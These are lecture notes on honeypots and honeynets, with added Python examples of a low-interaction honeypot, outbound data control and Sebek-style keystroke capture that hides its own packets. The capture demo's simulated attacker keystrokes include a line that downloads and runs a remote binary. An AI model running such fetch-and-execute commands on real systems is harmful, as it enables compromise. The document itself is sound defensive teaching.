Honeypots and Honeynets

Source: The HoneyNet Project http://www.honeynet.org/

Mehedi Masud

September 19, 2007

Lecture #12


Why HoneyPots

Much of the security profession, and the wider IT world, depends on honeypots. Honeypots are used to:

  • Build anti-virus signatures.

  • Build spam signatures and filters.

  • Let ISPs identify compromised customer systems.

  • Assist law enforcement in tracking criminals.

  • Hunt and shut down botnets.

  • Collect and analyse malware.


What are Honeypots

  • Honeypots are real or emulated vulnerable systems ready to be attacked.

  • Primary value of honeypots is to collect information.

  • This information is used to better identify, understand and protect against threats.

  • Honeypots add little direct value to protecting your network.


Types of HoneyPot

  • Server: put the honeypot on the Internet and let the attackers come to you.

  • Client: the honeypot initiates connections to servers (for example, by browsing web sites) and records how those servers behave.

  • Other: proxies (for example, an open proxy run to observe who abuses it).


Types of HoneyPot

  • Low-interaction

    • Emulates services, applications, and operating systems; no real service runs, so the attacker never gets a shell.

    • Low risk and easy to deploy and maintain, but captures limited information (typically only the first few exchanges).

  • High-interaction

    • Real services, applications, and operating systems.

    • Captures extensive information, but high risk (the system can really be compromised and used to attack others) and time-intensive to maintain.
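To make the low-interaction class concrete, here is an added example (example code written for this page, not software from the lecture or from the Honeynet Project) of a tiny Honeyd-style honeypot in Python. It hands out a canned banner and at most one canned reply, which is exactly what makes it low risk and also why it learns nothing past the first request. The service names, the banner strings, the mail.example.test hostname and the port 2222 are made up for the example.

```python
"""Added example: a minimal low-interaction honeypot in the Honeyd style.

It only ever answers with canned strings, so an attacker gains no foothold
(low risk), but it also learns nothing beyond the first request (limited data).
"""
import json
import socket
import socketserver
import time

# Constructed service emulations. The banners imitate versions that were
# common when this lecture was given; they are bait, not real software.
SERVICES = {
    "ssh":  {"banner": b"SSH-2.0-OpenSSH_4.3\r\n"},
    "smtp": {"banner": b"220 mail.example.test ESMTP Sendmail 8.13.8\r\n"},
}


def emulate(service, client_data):
    """Return (reply, log_record) for the client's first message.

    The reply is a fixed string chosen by a prefix check; no input is parsed
    any further, which is what keeps the honeypot low risk.
    """
    text = client_data.decode("latin-1", "replace").strip()
    if service == "ssh":
        # A real sshd would start key exchange after a valid version string;
        # we cannot, so we just close. Anything else gets sshd's own error text.
        reply = b"" if text.startswith("SSH-") else b"Protocol mismatch.\r\n"
    elif service == "smtp":
        reply = (b"250 mail.example.test Hello\r\n"
                 if text.upper().startswith(("EHLO", "HELO"))
                 else b"500 5.5.1 Command unrecognized\r\n")
    else:
        raise ValueError(f"no emulation for {service!r}")
    record = {
        "ts": round(time.time(), 3),
        "service": service,
        "request": text[:200],        # what the scanner or attacker sent first
        "reply": reply.decode("ascii").strip(),
        "session_ends": True,         # low interaction: nothing more to capture
    }
    return reply, record


class HoneypotHandler(socketserver.BaseRequestHandler):
    def handle(self):
        srv = self.server
        self.request.settimeout(10)
        self.request.sendall(SERVICES[srv.service]["banner"])
        try:
            data = self.request.recv(1024)
        except socket.timeout:
            data = b""                # banner grab only, e.g. a port scanner
        reply, record = emulate(srv.service, data)
        record["src"], record["sport"] = self.client_address[:2]
        srv.log.append(record)
        print(json.dumps(record))     # one JSON line per hit, easy to ship to a SIEM
        if data and reply:
            try:
                self.request.sendall(reply)
            except OSError:
                pass                  # client already gone


class Honeypot(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, bind, service):
        super().__init__(bind, HoneypotHandler)
        self.service = service
        self.log = []                 # in-memory copy of every record


if __name__ == "__main__":
    # Listen on an unprivileged port; NAT 22 -> 2222 on the host if real
    # scanners should find it.
    with Honeypot(("0.0.0.0", 2222), "ssh") as srv:
        print("low-interaction ssh honeypot on", srv.server_address)
        srv.serve_forever()
```

Every record carries `session_ends: True`, which is the limitation the slide describes: a scanner's banner grab or a brute-forcer's first line is captured, but whatever the attacker would have done after a login never happens, because there is nothing to log in to.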


Examples Of Honeypots

  • Low interaction

    • BackOfficer Friendly

    • KFSensor

    • Honeyd

  • High interaction

    • Honeynets


Honeynets

  • A high-interaction honeypot designed to capture in-depth information.

  • The information has different value to different organizations.

  • It's an architecture you populate with live systems, not a product or software.

  • Any traffic entering or leaving is suspect, because the systems have no production purpose.


How It Works

  • A highly controlled network where every packet entering or leaving is monitored, captured, and analyzed.

    • Data Control

    • Data Capture

    • Data Analysis


Honeynet Architecture (diagram)


Data Control

  • Mitigate the risk of the honeynet being used to harm non-honeynet systems: attackers must be able to get in, but what they can do going out is limited.

  • Count outbound connections per honeypot and block once a limit is reached.

  • IPS (Snort-Inline): drop or rewrite outbound packets that match known attack signatures.

  • Bandwidth throttling.
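The following is an added example, not the Honeywall's own rc.firewall or snort_inline (those were iptables rules and an inline Snort), that applies the same three ideas to a constructed flow log in Python: inbound traffic is always accepted, outbound connections are counted per honeypot and per protocol in a sliding window and dropped once over the limit, and accepted payloads are scrubbed with an equal-length replacement. The limit values, window, addresses and the "/bin/sh" to "/ben/sh" substitution are assumptions made for the example.

```python
"""Added example: honeywall-style data control over a constructed flow log.

Inbound traffic to the honeynet is always allowed (attackers must get in);
outbound connections are counted per honeypot and per protocol in a sliding
window and dropped once a limit is reached; payloads that are let through
are scrubbed the way an inline IPS "replace" rule would.
"""
import ipaddress
from collections import defaultdict, deque
from dataclasses import dataclass

# Outbound connections allowed per honeypot, per protocol, per window (assumed).
LIMITS = {"tcp": 20, "udp": 20, "icmp": 50, "other": 10}
WINDOW = 3600  # seconds

# Equal-length replacements only: changing a TCP payload's length inline would
# desynchronise sequence numbers, so bytes are swapped 1:1.
SCRUB = [(b"/bin/sh", b"/ben/sh")]


@dataclass
class Flow:
    ts: float          # seconds
    src: str
    dst: str
    proto: str         # "tcp", "udp", "icmp", ...
    payload: bytes = b""


def scrub(payload):
    for bad, good in SCRUB:
        payload = payload.replace(bad, good)
    return payload


class DataControl:
    def __init__(self, honeynet, limits=LIMITS, window=WINDOW):
        self.net = ipaddress.ip_network(honeynet)
        self.limits = limits
        self.window = window
        # (honeypot, proto) -> timestamps of outbound connections let through
        self.history = defaultdict(deque)

    def is_outbound(self, flow):
        return (ipaddress.ip_address(flow.src) in self.net
                and ipaddress.ip_address(flow.dst) not in self.net)

    def decide(self, flow):
        """Return (verdict, payload); verdict is "ACCEPT" or "DROP"."""
        if not self.is_outbound(flow):
            return "ACCEPT", flow.payload       # inbound: let them come
        proto = flow.proto if flow.proto in self.limits else "other"
        seen = self.history[(flow.src, proto)]
        while seen and flow.ts - seen[0] >= self.window:
            seen.popleft()                      # expire connections outside the window
        if len(seen) >= self.limits[proto]:
            return "DROP", flow.payload         # honeypot is trying to attack outward
        seen.append(flow.ts)
        return "ACCEPT", scrub(flow.payload)


def run_policy(flows, honeynet="10.0.0.0/24"):
    dc = DataControl(honeynet)
    return [dc.decide(f) for f in flows]


def demo():
    """Constructed flow log: an attacker reaches honeypot 10.0.0.5, which then
    tries 22 TCP connections out within a minute, sends one UDP packet carrying
    a shell string, and makes one more TCP connection an hour later."""
    flows = [Flow(0, "192.0.2.7", "10.0.0.5", "tcp", b"exploit")]
    flows += [Flow(10 + i, "10.0.0.5", "198.51.100.9", "tcp") for i in range(22)]
    flows.append(Flow(40, "10.0.0.5", "198.51.100.9", "udp", b"/bin/sh"))
    flows.append(Flow(3700, "10.0.0.5", "203.0.113.4", "tcp"))
    return run_policy(flows)


if __name__ == "__main__":
    for i, (verdict, payload) in enumerate(demo()):
        print(i, verdict, payload)
```

Note what the policy deliberately does not do: it never blocks inbound traffic, and it only starts dropping after the limit, so the first outbound connections (which are often the most interesting, such as the download of a toolkit) are still allowed and captured. That is the trade-off between learning and containment the slide is about.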


No Data Control (diagram)


Data Control (diagram)


Data Capture

  • Capture all activity at a variety of levels.

  • Network activity.

  • Application activity.

  • System activity.


Sebek

  • Hidden kernel module that captures all host activity, including every read() the attacker's shell makes, so keystrokes are recovered even inside an encrypted SSH session.

  • Dumps the captured activity to the network (to the Honeywall) rather than to a local log the attacker could find and alter.

  • Its own packets are identified by a magic number and destination port and are hidden from the host, so an attacker sniffing on the honeypot cannot see them.
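Added example for the Sebek slide and the Data Capture slide before it (this is illustrative code written for this page, not Sebek's source or wire format): a simplified capture record with the same kind of fields Sebek reported (pid, uid, fd, command name, data), the "destination port plus magic number" test a hiding module applies to its own packets, and the collector side that rebuilds keystrokes from records of reads on stdin. The header layout, the MAGIC value, the port 1101 and all addresses are assumptions for the example.

```python
"""Added example: Sebek-style keystroke capture and the hide-by-magic-and-port trick.

The record layout and the constants are a simplified stand-in, NOT Sebek's
real wire format.
"""
import struct
from dataclasses import dataclass

MAGIC = 0xD0D0D0D0            # assumed; a real module picks this at load time
CAPTURE_PORT = 1101           # assumed collector (Honeywall) port
VERSION = 3
TYPE_READ, TYPE_WRITE = 0, 1
# Simplified header: magic, version, type, counter, pid, uid, fd,
# 12-byte command name, data length. Network byte order.
HDR = struct.Struct("!IHHIIII12sI")


def pack_record(counter, pid, uid, fd, comm, data, rtype=TYPE_READ):
    """Serialise one captured read()/write() the way the kernel module would."""
    name = comm.encode("ascii", "replace")[:12].ljust(12, b"\0")
    return HDR.pack(MAGIC, VERSION, rtype, counter, pid, uid, fd, name, len(data)) + data


def unpack_record(buf):
    magic, ver, rtype, counter, pid, uid, fd, name, length = HDR.unpack_from(buf)
    if magic != MAGIC or ver != VERSION:
        raise ValueError("not a capture record")
    return {"type": rtype, "counter": counter, "pid": pid, "uid": uid, "fd": fd,
            "comm": name.rstrip(b"\0").decode("ascii"),
            "data": buf[HDR.size:HDR.size + length]}


@dataclass
class Packet:
    src: str
    dst: str
    dport: int
    payload: bytes


def is_capture(pkt):
    """The hiding test: destination port and leading magic number."""
    return pkt.dport == CAPTURE_PORT and pkt.payload[:4] == struct.pack("!I", MAGIC)


def attacker_view(packets):
    """What a sniffer the attacker runs ON the honeypot is allowed to see."""
    return [p for p in packets if not is_capture(p)]


def collector_view(packets):
    """The Honeywall side: rebuild each process's stdin stream (the keystrokes)."""
    sessions = {}
    for p in packets:
        if not is_capture(p):
            continue
        rec = unpack_record(p.payload)
        if rec["type"] == TYPE_READ and rec["fd"] == 0:
            key = (rec["pid"], rec["uid"], rec["comm"])
            sessions[key] = sessions.get(key, b"") + rec["data"]
    return sessions


def demo():
    """Constructed capture: the attacker's encrypted SSH session to honeypot
    10.0.0.5, interleaved with the records the module emits for what was typed."""
    wire = [Packet("192.0.2.7", "10.0.0.5", 22, b"<encrypted ssh>")]
    typed = [b"w\n", b"wget http://198.51.100.9/x\n", b"chmod +x x; ./x\n"]
    for i, keys in enumerate(typed):
        wire.append(Packet("10.0.0.5", "10.0.0.1", CAPTURE_PORT,
                           pack_record(i, 4242, 0, 0, "bash", keys)))
        wire.append(Packet("10.0.0.5", "192.0.2.7", 22, b"<encrypted ssh>"))
    return attacker_view(wire), collector_view(wire)


if __name__ == "__main__":
    seen, sessions = demo()
    print("attacker's sniffer sees", len(seen), "packets, all on port 22")
    for (pid, uid, comm), keys in sessions.items():
        print(f"{comm}[{pid}] uid={uid} typed:", keys.decode())
```

The caveat a practitioner should keep in mind: the hiding is done on the honeypot host. On the wire the records are ordinary UDP packets, so a second compromised machine on the same segment could sniff them, which is why the capture traffic is sent towards the Honeywall and must never be forwarded beyond it.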


Sebek Architecture (diagram)


Honeywall CDROM

  • An attempt to combine all the requirements of a Honeywall (data control, data capture, and data analysis) onto a single, bootable CDROM.

  • May, 2003 - Released Eeyore

  • May, 2005 - Released Roo


Roo Honeywall CDROM

  • Based on Fedora Core 3

  • Vastly improved hardware and international support.

  • Automated, headless installation

  • New Walleye interface for web based administration and data analysis.

  • Automated system updating.


Installation

  • Just insert the CDROM and boot; it installs to the local hard drive.

  • After it reboots for the first time, it runs a hardening script based on NIST and CIS security standards.

  • Following installation you get a command prompt, and the system is ready to configure.


Further Information

  • http://www.honeynet.org/

  • http://www.honeynet.org/book
